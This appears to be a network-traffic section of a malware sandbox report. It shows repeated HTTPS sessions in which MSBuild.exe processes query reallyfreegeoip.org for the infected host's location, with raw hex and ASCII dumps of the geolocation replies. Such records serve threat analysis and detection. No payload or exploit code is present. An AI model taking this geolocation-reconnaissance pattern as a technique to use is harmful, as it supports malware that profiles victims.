Timestamp	Bytes transferred	Direction	Data
2024-11-08 15:15:28 UTC	63	OUT	GET /xml/173.254.250.90 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-08 15:15:28 UTC	1215	IN	HTTP/1.1 200 OK Date: Fri, 08 Nov 2024 15:15:28 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: 6faed900-016e-4e5e-a211-e485a8342369 x-amzn-trace-id: Root=1-672daf75-5cf9589710b7718d28419240;Parent=29665f1bc67c9060;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 1fe1fb13f3fdb246ffe26042a7d8f9b0.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: G4WREKFxOYROHi3MeKGuUlXivgL0Kb3Ff_tGLlXaadTYoynIqx5Zxg== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 31643 Last-Modified: Fri, 08 Nov 2024 06:28:05 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yqDnBVrMQCZfwqvii3yE3UGxPh2qWjwHiET85293gTuJdDRYHcyoRHbcGkMWFcmyyggGUKXgRF7QJ7rqxNfmRm2SzEVqB5AkggUpD07n%2FJkluTTgAMb2WTKNC9bsoINGAo%2FUkRko"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8df684c6490f6bc8-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1859&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1587719&cwnd=233&unsent_bytes=0&cid=b924f31a34a4b69f&ts=154&x=0"
2024-11-08 15:15:28 UTC	154	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 Data Ascii: <Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Tex
2024-11-08 15:15:28 UTC	205	IN	Data Raw: 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: as</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.10	49727	188.114.96.3	443	5892	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-08 15:15:29 UTC	87	OUT	GET /xml/173.254.250.90 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-08 15:15:29 UTC	1227	IN	HTTP/1.1 200 OK Date: Fri, 08 Nov 2024 15:15:29 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: 6faed900-016e-4e5e-a211-e485a8342369 x-amzn-trace-id: Root=1-672daf75-5cf9589710b7718d28419240;Parent=29665f1bc67c9060;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 1fe1fb13f3fdb246ffe26042a7d8f9b0.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: G4WREKFxOYROHi3MeKGuUlXivgL0Kb3Ff_tGLlXaadTYoynIqx5Zxg== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 31644 Last-Modified: Fri, 08 Nov 2024 06:28:05 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mdaHGywLdCYFa8oMKO%2FT4wC4fKNuIyqYtEhtWUMBXoTgjmhYpQh7YW%2F8BTR%2BZQrEJ3Dg0wlG1R2N4ICIbFFJJ%2FizVYGu%2FwV8hqpDaCjG%2B9I%2BnLhYj0TBRjD5Gm6tNi%2BznF9Io9GS"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8df684cfcfdd3159-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2283&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=1327222&cwnd=234&unsent_bytes=0&cid=fbc8d07344edb8ac&ts=274&x=0"
2024-11-08 15:15:29 UTC	142	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 Data Ascii: <Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><Re
2024-11-08 15:15:29 UTC	217	IN	Data Raw: 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: gionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.10	49726	188.114.96.3	443	6056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-08 15:15:30 UTC	87	OUT	GET /xml/173.254.250.90 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-08 15:15:30 UTC	1221	IN	HTTP/1.1 200 OK Date: Fri, 08 Nov 2024 15:15:30 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: 6faed900-016e-4e5e-a211-e485a8342369 x-amzn-trace-id: Root=1-672daf75-5cf9589710b7718d28419240;Parent=29665f1bc67c9060;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 1fe1fb13f3fdb246ffe26042a7d8f9b0.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: G4WREKFxOYROHi3MeKGuUlXivgL0Kb3Ff_tGLlXaadTYoynIqx5Zxg== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 31645 Last-Modified: Fri, 08 Nov 2024 06:28:05 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gNqKvFfPBXNXPV%2FttfUJMhbtWbcwAhmF%2BrzJm57X2IeJEP%2FeBDugCQvPhE%2FUtF4xnB3YOoUgOC2c6Zcrcq%2Byiwn6NhLG5SrkzixNSG1p8HhYKWkKJJ0cXlrW6SaavUM1HvLNIKSF"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8df684d149b5a918-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1573&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1808869&cwnd=177&unsent_bytes=0&cid=c7b2479d8f501ead&ts=722&x=0"
2024-11-08 15:15:30 UTC	148	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 Data Ascii: <Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionNa
2024-11-08 15:15:30 UTC	211	IN	Data Raw: 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: me>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.10	49739	188.114.96.3	443	6056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-08 15:15:30 UTC	63	OUT	GET /xml/173.254.250.90 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-08 15:15:31 UTC	1220	IN	HTTP/1.1 200 OK Date: Fri, 08 Nov 2024 15:15:31 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: 6faed900-016e-4e5e-a211-e485a8342369 x-amzn-trace-id: Root=1-672daf75-5cf9589710b7718d28419240;Parent=29665f1bc67c9060;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 1fe1fb13f3fdb246ffe26042a7d8f9b0.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: G4WREKFxOYROHi3MeKGuUlXivgL0Kb3Ff_tGLlXaadTYoynIqx5Zxg== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 31646 Last-Modified: Fri, 08 Nov 2024 06:28:05 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bd6%2FzEV2mE2BJAulQJxQyYOX110%2BXHn0r%2FJ2HdR1rvcqAkvfX5ORrskjVTL0jPIapW%2FC1jj7MtnDtAUJfjb91frwkmqsyRSbUcn%2FK6G2PZdlvQuca8MXMIcHpdZJ7jHMr531WmCA"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8df684d71de6e85b-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1573&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1857601&cwnd=95&unsent_bytes=0&cid=92516a6be233bf9a&ts=157&x=0"
2024-11-08 15:15:31 UTC	149	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d Data Ascii: <Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionNam
2024-11-08 15:15:31 UTC	210	IN	Data Raw: 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: e>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.10	49740	188.114.96.3	443	5892	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-08 15:15:32 UTC	87	OUT	GET /xml/173.254.250.90 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-08 15:15:32 UTC	1221	IN	HTTP/1.1 200 OK Date: Fri, 08 Nov 2024 15:15:32 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: 6faed900-016e-4e5e-a211-e485a8342369 x-amzn-trace-id: Root=1-672daf75-5cf9589710b7718d28419240;Parent=29665f1bc67c9060;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 1fe1fb13f3fdb246ffe26042a7d8f9b0.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: G4WREKFxOYROHi3MeKGuUlXivgL0Kb3Ff_tGLlXaadTYoynIqx5Zxg== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 31647 Last-Modified: Fri, 08 Nov 2024 06:28:05 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=17CDHQ4nckDNXORuCfWKSgS0R2hlijUc%2B6ohjQ75WPBrr8%2BtLfTmkvLU02VodPCclLkvY093L4ZIoAh1vQykoJP0BNq6P8FI9YrfWi0Kxn3a%2BnBE%2F5s74jXiOWSnLN4tbP%2BZ7kK4"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8df684df7c07a918-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1923&sent=4&recv=6&lost=0&retrans=1&sent_bytes=2848&recv_bytes=701&delivery_rate=2092485&cwnd=177&unsent_bytes=0&cid=6a69929e57b1892b&ts=173&x=0"
2024-11-08 15:15:32 UTC	148	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 Data Ascii: <Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionNa
2024-11-08 15:15:32 UTC	211	IN	Data Raw: 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: me>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.10	49753	188.114.96.3	443	6056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-08 15:15:33 UTC	63	OUT	GET /xml/173.254.250.90 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-08 15:15:33 UTC	1221	IN	HTTP/1.1 200 OK Date: Fri, 08 Nov 2024 15:15:33 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: 6faed900-016e-4e5e-a211-e485a8342369 x-amzn-trace-id: Root=1-672daf75-5cf9589710b7718d28419240;Parent=29665f1bc67c9060;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 1fe1fb13f3fdb246ffe26042a7d8f9b0.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: G4WREKFxOYROHi3MeKGuUlXivgL0Kb3Ff_tGLlXaadTYoynIqx5Zxg== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 31648 Last-Modified: Fri, 08 Nov 2024 06:28:05 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k8gb6j6xdzsPMpgr6pq4nDnjZ%2FrhQs1hNocO7qLeTHlTJqJtu5Ua64xUkjWtTazZqKeJt17avwzeXrEajZ%2BcLWLJk0CTP0WnVCH8Y0E2vovshod%2FxlSa0M2JQc%2BLjPZQZpX4QN%2FP"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8df684e64bc24778-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1253&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=2244961&cwnd=249&unsent_bytes=0&cid=2dbe3686e683a879&ts=167&x=0"
2024-11-08 15:15:33 UTC	148	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 Data Ascii: <Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionNa
2024-11-08 15:15:33 UTC	211	IN	Data Raw: 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: me>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.10	49765	188.114.96.3	443	5892	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-08 15:15:34 UTC	87	OUT	GET /xml/173.254.250.90 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-08 15:15:35 UTC	1217	IN	HTTP/1.1 200 OK Date: Fri, 08 Nov 2024 15:15:34 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: 6faed900-016e-4e5e-a211-e485a8342369 x-amzn-trace-id: Root=1-672daf75-5cf9589710b7718d28419240;Parent=29665f1bc67c9060;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 1fe1fb13f3fdb246ffe26042a7d8f9b0.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: G4WREKFxOYROHi3MeKGuUlXivgL0Kb3Ff_tGLlXaadTYoynIqx5Zxg== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 31649 Last-Modified: Fri, 08 Nov 2024 06:28:05 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PMZJT%2BzzVeqFLblGVSAY8mM5ikrgCpahgT0MLudYvNWWlwmHsj4QdML35vTP1R6DhKC84nrM%2B34pvmzOASpq7zXJ9XIBjghh10Wqu4JIJwzR3S2%2FC3SlXTaMn8DHRmgEbzM1dBgf"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8df684ef886ae6f6-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1381&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2043754&cwnd=238&unsent_bytes=0&cid=950709fa73f8bb9e&ts=161&x=0"
2024-11-08 15:15:35 UTC	152	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 Data Ascii: <Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>T
2024-11-08 15:15:35 UTC	207	IN	Data Raw: 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: exas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.10	49772	188.114.96.3	443	6056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-08 15:15:35 UTC	87	OUT	GET /xml/173.254.250.90 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
